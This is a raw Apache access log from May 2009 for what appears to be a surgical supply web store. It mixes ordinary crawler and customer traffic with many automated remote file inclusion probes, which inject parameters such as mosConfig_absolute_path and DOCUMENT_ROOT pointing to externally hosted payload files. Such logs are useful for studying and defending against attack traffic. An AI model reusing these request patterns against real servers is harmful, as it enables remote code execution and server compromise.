66.249.72.114 - - [08/May/2009:00:00:03 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0094E8487DB0B300C56C041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [08/May/2009:00:00:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.116.178.20 - - [08/May/2009:00:00:23 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:00:23 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 486 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:00:23 -0400] "GET /logs/access_log.Q108072400///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:00:25 -0400] "GET /logs/access_log.Q108081200///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
82.144.220.245 - - [08/May/2009:00:00:50 -0400] "GET /logs/access_log.Q108072400///?_SERVER[DOCUMENT_ROOT]=http://www.abirdseyeviewof.com/files/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
82.144.220.245 - - [08/May/2009:00:00:50 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.abirdseyeviewof.com/files/id.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.803"
82.144.220.245 - - [08/May/2009:00:00:51 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.abirdseyeviewof.com/files/id.txt??? HTTP/1.1" 200 486 "-" "libwww-perl/5.803"
82.144.220.245 - - [08/May/2009:00:01:31 -0400] "GET /logs/access_log.Q108081200///?_SERVER[DOCUMENT_ROOT]=http://www.abirdseyeviewof.com/files/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
222.236.44.32 - - [08/May/2009:00:01:43 -0400] "GET /logs/error_log.Q108080800/errors.php?error=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
24.7.183.45 - - [08/May/2009:00:01:54 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN HTTP/1.1" 200 37788 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:55 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:55 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:55 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:55 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:55 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
66.249.72.114 - - [08/May/2009:00:01:56 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0094E54B7FB0F100092C043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:01:56 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:02:01 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0035A14F8B60B200AB0C081+M37+ENG HTTP/1.1" 200 36149 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:02:09 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0035A1478BE05200B35C081+M37+ENG HTTP/1.1" 200 35720 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0035A14F8B60B200AB0C081+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
24.7.183.45 - - [08/May/2009:00:02:22 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0035A14D82206200B56C081+M37+ENG HTTP/1.1" 200 34512 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0035A1478BE05200B35C081+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
87.106.15.200 - - [08/May/2009:00:02:39 -0400] "GET /logs/access_log.Q108081900/e404.php?DOCUMENT_ROOT=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:02:58 -0400] "GET /logs/access_log.Q108081900/e404.php?DOCUMENT_ROOT=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:03:01 -0400] "GET /logs/access_log.Q108081900/e404.php?DOCUMENT_ROOT=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
124.0.109.129 - - [08/May/2009:00:03:13 -0400] "GET /logs/access_log.Q108093000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.0.109.129 - - [08/May/2009:00:03:13 -0400] "GET /logs/access_log.Q108111200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
123.125.64.38 - - [08/May/2009:00:03:37 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.72.114 - - [08/May/2009:00:03:37 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [08/May/2009:00:03:37 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0058EE4711D079006FAB06G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [08/May/2009:00:03:49 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0094E8487DD03300CB6C041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.116.168.108 - - [08/May/2009:00:04:25 -0400] "GET /logs/access_log.Q108121400%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:04:27 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:04:27 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 486 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:04:27 -0400] "GET /logs/access_log.Q108072400///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:04:32 -0400] "GET /logs/access_log.Q108081200///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
82.144.220.245 - - [08/May/2009:00:04:59 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.abirdseyeviewof.com/files/id.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.803"
209.59.12.99 - - [08/May/2009:00:05:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [08/May/2009:00:05:09 -0400] "GET /logs/access_log.Q108101100%20%20//include/admin.lib.inc.php?site_path=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:00:05:10 -0400] "GET /logs/access_log.Q108091600%20%20//include/admin.lib.inc.php?site_path=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:00:05:33 -0400] "GET /errors.php?error=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:00:05:33 -0400] "GET /logs/access_log.Q108100500/errors.php?error=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:00:05:33 -0400] "GET /logs/errors.php?error=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:00:05:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0054C9417FE089000B1C05Z+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
190.144.44.36 - - [08/May/2009:00:07:07 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.144.44.36 - - [08/May/2009:00:07:07 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
190.144.44.36 - - [08/May/2009:00:07:07 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
85.214.53.125 - - [08/May/2009:00:07:25 -0400] "GET /appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
85.214.53.125 - - [08/May/2009:00:07:25 -0400] "GET /logs/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 219 "-" "libwww-perl/5.803"
85.214.53.125 - - [08/May/2009:00:07:25 -0400] "GET /logs/access_log.Q109020800/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
85.214.53.125 - - [08/May/2009:00:07:26 -0400] "GET /logs/access_log.Q109013100/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
84.54.137.9 - - [08/May/2009:00:07:30 -0400] "GET /logs/access_log.Q108121300/playing.php/common/db.php?commonpath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
84.54.137.9 - - [08/May/2009:00:07:30 -0400] "GET /logs/access_log.Q109042500/playing.php/common/db.php?commonpath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:00:07:32 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0054C9417F90F9000A1C05Z+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [08/May/2009:00:08:28 -0400] "GET /logs/access_log.Q108101500%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:00:08:28 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:00:08:28 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:00:08:36 -0400] "GET /logs/access_log.Q108102400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:08:52 -0400] "GET /logs/access_log.Q108083100//include/admin.lib.inc.php?site_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:09:08 -0400] "GET /logs/access_log.Q108091300//include/admin.lib.inc.php?site_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:00:09:26 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0094E54B7FE04100042C043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [08/May/2009:00:09:30 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:00:09:30 -0400] "GET /logs/access_log.Q108101500%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:00:09:30 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:00:09:39 -0400] "GET /logs/access_log.Q108102400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.30.142.94 - - [08/May/2009:00:09:50 -0400] "GET /logs/error_log.Q107071200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [08/May/2009:00:10:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.142.94 - - [08/May/2009:00:10:31 -0400] "GET /logs/error_log.Q107080900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.32.100.130 - - [08/May/2009:00:10:58 -0400] "GET /playing.php/common/db.php?commonpath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:00:10:58 -0400] "GET /logs/playing.php/common/db.php?commonpath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:00:10:58 -0400] "GET /logs/access_log.Q109030500%20%20/playing.php/common/db.php?commonpath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.30.142.94 - - [08/May/2009:00:11:04 -0400] "GET /logs/access_log.Q107110500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.32.100.130 - - [08/May/2009:00:11:04 -0400] "GET /logs/access_log.Q108121300%20%20/playing.php/common/db.php?commonpath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:00:11:18 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0054C94170109900012C05Z+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.30.142.94 - - [08/May/2009:00:11:28 -0400] "GET /logs/access_log.Q107073000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
122.116.178.20 - - [08/May/2009:00:11:37 -0400] "GET /logs/access_log.Q108072400%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:11:39 -0400] "GET /logs/access_log.Q108081200%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.89.31.105 - - [08/May/2009:00:11:59 -0400] "GET /logs/access_log.Q108122800//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 294 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:00:11:59 -0400] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:00:12:00 -0400] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.812"
88.84.128.40 - - [08/May/2009:00:12:01 -0400] "GET /logs/access_log.Q108122800//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 294 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:00:12:01 -0400] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:00:12:01 -0400] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.803"
122.116.178.20 - - [08/May/2009:00:12:04 -0400] "GET /logs/access_log.Q108072400%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
